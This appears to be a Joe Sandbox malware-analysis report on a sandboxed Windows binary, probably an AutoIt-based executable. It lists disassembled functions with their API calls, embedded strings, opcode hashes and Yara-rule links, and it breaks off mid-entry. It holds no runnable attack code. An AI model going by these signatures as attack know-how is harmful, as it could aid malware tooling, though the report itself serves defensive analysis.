Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: cc8170f27e50c8326afe9e51038498821d238318dc73adeadf0ffeb66b55a1fb
Instruction ID: a39c211499a762b5b83dccdb1ca746c800dfb05a34a38d2ca64260ef5298e1cb
Opcode Fuzzy Hash: cc8170f27e50c8326afe9e51038498821d238318dc73adeadf0ffeb66b55a1fb
Instruction Fuzzy Hash: 8CA158302142029FCB14FF24C961B6AB7A5EF94314F144969B8AA9B7D3DB70ED09CB71

Function 00D752F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00D75309
LoadCursorW.USER32(00000000,00007F8A), ref: 00D75314
LoadCursorW.USER32(00000000,00007F00), ref: 00D7531F
LoadCursorW.USER32(00000000,00007F03), ref: 00D7532A
LoadCursorW.USER32(00000000,00007F8B), ref: 00D75335
LoadCursorW.USER32(00000000,00007F01), ref: 00D75340
LoadCursorW.USER32(00000000,00007F81), ref: 00D7534B
LoadCursorW.USER32(00000000,00007F88), ref: 00D75356
LoadCursorW.USER32(00000000,00007F80), ref: 00D75361
LoadCursorW.USER32(00000000,00007F86), ref: 00D7536C
LoadCursorW.USER32(00000000,00007F83), ref: 00D75377
LoadCursorW.USER32(00000000,00007F85), ref: 00D75382
LoadCursorW.USER32(00000000,00007F82), ref: 00D7538D
LoadCursorW.USER32(00000000,00007F84), ref: 00D75398
LoadCursorW.USER32(00000000,00007F04), ref: 00D753A3
LoadCursorW.USER32(00000000,00007F02), ref: 00D753AE
GetCursorInfo.USER32(?), ref: 00D753BE
GetLastError.KERNEL32(00000001,00000000), ref: 00D753E9

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: e218680c66f6ed468962eeaa74b72ebb1132a47f28e871ef391ce440a49833bb
Instruction ID: a76ed7e025f1d9c686f2ff5a57db9e790ae5faf5601415021768047f9a7c5da6
Opcode Fuzzy Hash: e218680c66f6ed468962eeaa74b72ebb1132a47f28e871ef391ce440a49833bb
Instruction Fuzzy Hash: AD415170E043196ADB109FBA9C4996EFFF8EF51B50B10452FE509E7291DAB8A4018E61

Function 00D5AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00D5AAA5
__swprintf.LIBCMT ref: 00D5AB46
_wcscmp.LIBCMT ref: 00D5AB59
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00D5ABAE
_wcscmp.LIBCMT ref: 00D5ABEA
GetClassNameW.USER32(?,?,00000400), ref: 00D5AC21
GetDlgCtrlID.USER32(?), ref: 00D5AC73
GetWindowRect.USER32(?,?), ref: 00D5ACA9
GetParent.USER32(?), ref: 00D5ACC7
ScreenToClient.USER32(00000000), ref: 00D5ACCE
GetClassNameW.USER32(?,?,00000100), ref: 00D5AD48
_wcscmp.LIBCMT ref: 00D5AD5C
GetWindowTextW.USER32(?,?,00000400), ref: 00D5AD82
_wcscmp.LIBCMT ref: 00D5AD96

Part of subcall function 00D2386C: _iswctype.LIBCMT ref: 00D23874

Strings

%s%u, xrefs: 00D5AB40

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 6b48cf0cde4c1606b0736a30864653941e4d7a6db3c54a09b57e8e04eaeaf299
Instruction ID: 7d2e308070b3606d1172b9c4e4951e964b06dbcf3ef141dee40e7d1868dfead0
Opcode Fuzzy Hash: 6b48cf0cde4c1606b0736a30864653941e4d7a6db3c54a09b57e8e04eaeaf299
Instruction Fuzzy Hash: FAA19671204316AFDB14DF28C884BAAB7E8FF04356F14462AFD99D2150E730E959CBB2

Function 00D5B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00D5B3DB
_wcscmp.LIBCMT ref: 00D5B3EC
GetWindowTextW.USER32(00000001,?,00000400), ref: 00D5B414
CharUpperBuffW.USER32(?,00000000), ref: 00D5B431
_wcscmp.LIBCMT ref: 00D5B44F
_wcsstr.LIBCMT ref: 00D5B460
GetClassNameW.USER32(00000018,?,00000400), ref: 00D5B498
_wcscmp.LIBCMT ref: 00D5B4A8
GetWindowTextW.USER32(00000002,?,00000400), ref: 00D5B4CF
GetClassNameW.USER32(00000018,?,00000400), ref: 00D5B518
_wcscmp.LIBCMT ref: 00D5B528
GetClassNameW.USER32(00000010,?,00000400), ref: 00D5B550
GetWindowRect.USER32(00000004,?), ref: 00D5B5B9

Strings

ThumbnailClass, xrefs: 00D5B4A3, 00D5B523
@, xrefs: 00D5B3BC

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 8b628273b013eb7dac8c7ddfb7582a79bbca0575cf027d6882eddd93c059cd00
Instruction ID: 825e5d742aff11a2db10e9dbbc64acb990b6e5f79b5bcc7344b19c3023c49c3d
Opcode Fuzzy Hash: 8b628273b013eb7dac8c7ddfb7582a79bbca0575cf027d6882eddd93c059cd00
Instruction Fuzzy Hash: F5819C710083059BDF14DF10D885FAA7BE8EF5432AF18856AFD899A092EB34DD49CB71

Function 00D5B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00D5B23F

Strings

LAST, xrefs: 00D5B204
[CLASS:, xrefs: 00D5B28F
[HANDLE:, xrefs: 00D5B24B
ACTIVE, xrefs: 00D5B21A
[ALL, xrefs: 00D5B2E5
ALL, xrefs: 00D5B2D3
CLASSNAME=, xrefs: 00D5B27C
[REGEXPTITLE:, xrefs: 00D5B267
HANDLE=, xrefs: 00D5B238
[LAST, xrefs: 00D5B2EC
[ACTIVE, xrefs: 00D5B22C
REGEXP=, xrefs: 00D5B254

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 22eeca4e149c7505a8ef6d39d4ef02e779af52a65771af2def23aa7b68f4cb29
Instruction ID: 9cb509b471f32f66b82db8725387de54cac733ee4a67b9001886a359e91b1331
Opcode Fuzzy Hash: 22eeca4e149c7505a8ef6d39d4ef02e779af52a65771af2def23aa7b68f4cb29
Instruction Fuzzy Hash: 0031AD30A04245EADF14FA60DD53FEEB7A4DF24761F60002ABD46750D2EF61AE08CA75

Function 00D5C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00D5C4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00D5C4E6
SetWindowTextW.USER32(?,?), ref: 00D5C4FD
GetDlgItem.USER32(?,000003EA), ref: 00D5C512
SetWindowTextW.USER32(00000000,?), ref: 00D5C518
GetDlgItem.USER32(?,000003E9), ref: 00D5C528
SetWindowTextW.USER32(00000000,?), ref: 00D5C52E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00D5C54F
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00D5C569
GetWindowRect.USER32(?,?), ref: 00D5C572
SetWindowTextW.USER32(?,?), ref: 00D5C5DD
GetDesktopWindow.USER32 ref: 00D5C5E3
GetWindowRect.USER32(00000000), ref: 00D5C5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00D5C636
GetClientRect.USER32(?,?), ref: 00D5C643
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00D5C668
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00D5C693

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 435770b67ff5afda3dfe46fe219e887a5fe3bfee9d8199bd0aa666625219ad15
Instruction ID: 51ddbcc77a203a08292cc79d54a92558b429a5f5ec9b81853814cf6d13a99a1d
Opcode Fuzzy Hash: 435770b67ff5afda3dfe46fe219e887a5fe3bfee9d8199bd0aa666625219ad15
Instruction Fuzzy Hash: C3516170910709AFDB20DFA8DD85B6EBBF5FF04705F004528EA86A26A0D774F955CB60

Function 00D8A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D8A4C8
DestroyWindow.USER32(?,?), ref: 00D8A542

Part of subcall function 00D07D2C: _memmove.LIBCMT ref: 00D07D66

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00D8A5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00D8A5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D8A5F1
DestroyWindow.USER32(00000000), ref: 00D8A613
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00D00000,00000000), ref: 00D8A64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D8A663
GetDesktopWindow.USER32 ref: 00D8A67C
GetWindowRect.USER32(00000000), ref: 00D8A683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00D8A69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00D8A6B3

Part of subcall function 00D025DB: GetWindowLongW.USER32(?,000000EB), ref: 00D025EC

Strings

0, xrefs: 00D8A4DE
tooltips_class32, xrefs: 00D8A5B5, 00D8A643

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 7068ef7a3d1adaa2b06fe2ed9d69cb46804546bae6e93d7841226a31488909dc
Instruction ID: 772bff63f6777554a4db7df3cb7f3e7fed17000ac55d1fed5553769d4d487a3a
Opcode Fuzzy Hash: 7068ef7a3d1adaa2b06fe2ed9d69cb46804546bae6e93d7841226a31488909dc
Instruction Fuzzy Hash: 21715871150705AFE721DF28C84AF6A77E5FB98304F08492EF985872A0E770E946CB32

Function 00D8C8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D02612: GetWindowLongW.USER32(?,000000EB), ref: 00D02623

DragQueryPoint.SHELL32(?,?), ref: 00D8C917

Part of subcall function 00D8ADF1: ClientToScreen.USER32(?,?), ref: 00D8AE1A
Part of subcall function 00D8ADF1: GetWindowRect.USER32(?,?), ref: 00D8AE90
Part of subcall function 00D8ADF1: PtInRect.USER32(?,?,00D8C304), ref: 00D8AEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 00D8C980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00D8C98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00D8C9AE
_wcscat.LIBCMT ref: 00D8C9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00D8C9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 00D8CA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 00D8CA25
SendMessageW.USER32(?,000000B1,?,?), ref: 00D8CA47
DragFinish.SHELL32(?), ref: 00D8CA4E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00D8CB41

Strings

@GUI_DROPID, xrefs: 00D8CA6E
@GUI_DRAGID, xrefs: 00D8CAB9
@GUI_DRAGFILE, xrefs: 00D8CAF0

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 6d1304b4534aaa9531f7bf4456934db4b59ae4dbcb1706eade25069ca2750788
Instruction ID: 0508027b9ff32e8b6acb61574d125a1f2f1d9315207dda9ad51df244571e2f9c
Opcode Fuzzy Hash: 6d1304b4534aaa9531f7bf4456934db4b59ae4dbcb1706eade25069ca2750788
Instruction Fuzzy Hash: 96614C71118301AFC701EF64DC85E9BBBE8EF88710F400A1EF595972A1DB709A49CB72

Function 00D84619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00D846AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00D846F6

Strings

EXISTS, xrefs: 00D8475F
COLLAPSE, xrefs: 00D8473C
SELECT, xrefs: 00D848A7
GETTEXT, xrefs: 00D84849
UNCHECK, xrefs: 00D848D2
GETITEMCOUNT, xrefs: 00D847D8
GETSELECTED, xrefs: 00D84806
EXPAND, xrefs: 00D847A8
GETTOTALCOUNT, xrefs: 00D846DD
CHECK, xrefs: 00D84716
ISCHECKED, xrefs: 00D84879

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: a9e39343da117b7e3e15db244ab4dd6a20ff2be341c7ce43a4268537cb88f0da
Instruction ID: 54a9305b1f7a3038e5f8f0b288b5b7f4047c72f69024fbf3af6854c65781aded
Opcode Fuzzy Hash: a9e39343da117b7e3e15db244ab4dd6a20ff2be341c7ce43a4268537cb88f0da
Instruction Fuzzy Hash: DB9139342047129FCB14FF24C851A6ABBA1EF94314F04485DE89A5B7A3DB74ED4ACBB1

Function 00D8BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00D8BB6E
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00D86D80,?), ref: 00D8BBCA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00D8BC03
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00D8BC46
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00D8BC7D
FreeLibrary.KERNEL32(?), ref: 00D8BC89
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00D8BC99
DestroyIcon.USER32(?), ref: 00D8BCA8
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00D8BCC5
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00D8BCD1

Part of subcall function 00D2313D: __wcsicmp_l.LIBCMT ref: 00D231C6

Strings

.icl, xrefs: 00D8BAE4
.exe, xrefs: 00D8BB04
.dll, xrefs: 00D8BB27

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 5d8efaf3ad848845b6a0ce062d3341f2a4f60719c64ed7bbb863d7c13bba43dc
Instruction ID: 3da72f5f7ea5a56428a63930c5567238cabbb74a89280367d1015e30f528c021
Opcode Fuzzy Hash: 5d8efaf3ad848845b6a0ce062d3341f2a4f60719c64ed7bbb863d7c13bba43dc
Instruction Fuzzy Hash: F761CEB1600619BAEB14EF74DC45FBE7BA8EB08720F10411AF815D61D1DBB4AA90DBB0

Function 00D6A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00D09997: __itow.LIBCMT ref: 00D099C2
Part of subcall function 00D09997: __swprintf.LIBCMT ref: 00D09A0C

CharLowerBuffW.USER32(?,?), ref: 00D6A636
GetDriveTypeW.KERNEL32 ref: 00D6A683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D6A6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D6A702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D6A730

Part of subcall function 00D07D2C: _memmove.LIBCMT ref: 00D07D66

Strings

wait, xrefs: 00D6A6ED
close cd wait, xrefs: 00D6A71B
type cdaudio alias cd wait, xrefs: 00D6A6AE
open, xrefs: 00D6A65D
close, xrefs: 00D6A63C
open , xrefs: 00D6A692
set cd door , xrefs: 00D6A6D1
closed, xrefs: 00D6A64A, 00D6A653

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 5a1e3f9439730904069924d4d33484c916fdd34bd6fe53a50910fa816473ed26
Instruction ID: ea9bb7e60df0394e53652227ef2fd31a775fc2ea2cc931c24d1f7ee20770709f
Opcode Fuzzy Hash: 5a1e3f9439730904069924d4d33484c916fdd34bd6fe53a50910fa816473ed26
Instruction Fuzzy Hash: E5515A715047059FC700EF24C89196AB7E4EF94718F04496CF88A9B2A2DB31AE0ACF72

Function 00D6A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00D6A47A
__swprintf.LIBCMT ref: 00D6A49C
CreateDirectoryW.KERNEL32(?,00000000), ref: 00D6A4D9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00D6A4FE
_memset.LIBCMT ref: 00D6A51D
_wcsncpy.LIBCMT ref: 00D6A559
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00D6A58E
CloseHandle.KERNEL32(00000000), ref: 00D6A599
RemoveDirectoryW.KERNEL32(?), ref: 00D6A5A2
CloseHandle.KERNEL32(00000000), ref: 00D6A5AC

Strings

:, xrefs: 00D6A4BD
\, xrefs: 00D6A4B2
\??\%s, xrefs: 00D6A496

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 05ee5929389f295ac1eceaaf5ff9a4e68316ce465b288b64d856810a8228965d
Instruction ID: 1356101b1508920cca4315f21997d541fc01eb77787dfd91cad5bb65a86b99f3
Opcode Fuzzy Hash: 05ee5929389f295ac1eceaaf5ff9a4e68316ce465b288b64d856810a8228965d
Instruction Fuzzy Hash: E931AEB5500219ABDB20DFA4DC48FEB73BCEF88701F1441B6FA09E2160EB7096448B35

Function 00D3AB1B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE

Download Yara Rule

APIs

_copy_environ.LIBCMT ref: 00D3AB7B
___wtomb_environ.LIBCMT ref: 00D3AB9D

Part of subcall function 00D28D68: __getptd_noexit.LIBCMT ref: 00D28D68

__malloc_crt.LIBCMT ref: 00D3ABC5
__malloc_crt.LIBCMT ref: 00D3ABE2
_free.LIBCMT ref: 00D3AC19
__recalloc_crt.LIBCMT ref: 00D3AC52
__recalloc_crt.LIBCMT ref: 00D3AC97
_strlen.LIBCMT ref: 00D3ACC3
__calloc_crt.LIBCMT ref: 00D3ACCD
_strlen.LIBCMT ref: 00D3ACDC
SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 00D3AD0A
_free.LIBCMT ref: 00D3AD24
_free.LIBCMT ref: 00D3AD31
_free.LIBCMT ref: 00D3AD43
__invoke_watson.LIBCMT ref: 00D3AD5D

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
String ID:
API String ID: 884005220-0
Opcode ID: 6c35ef5dca9f99e6cb0af7a26d50e1f9ff9f79798ecb4c0d7d25b11631660c77
Instruction ID: bf79454512864f0168076ee32df85944b944eaa20d7e33ca8cb6c7d59c8b6687
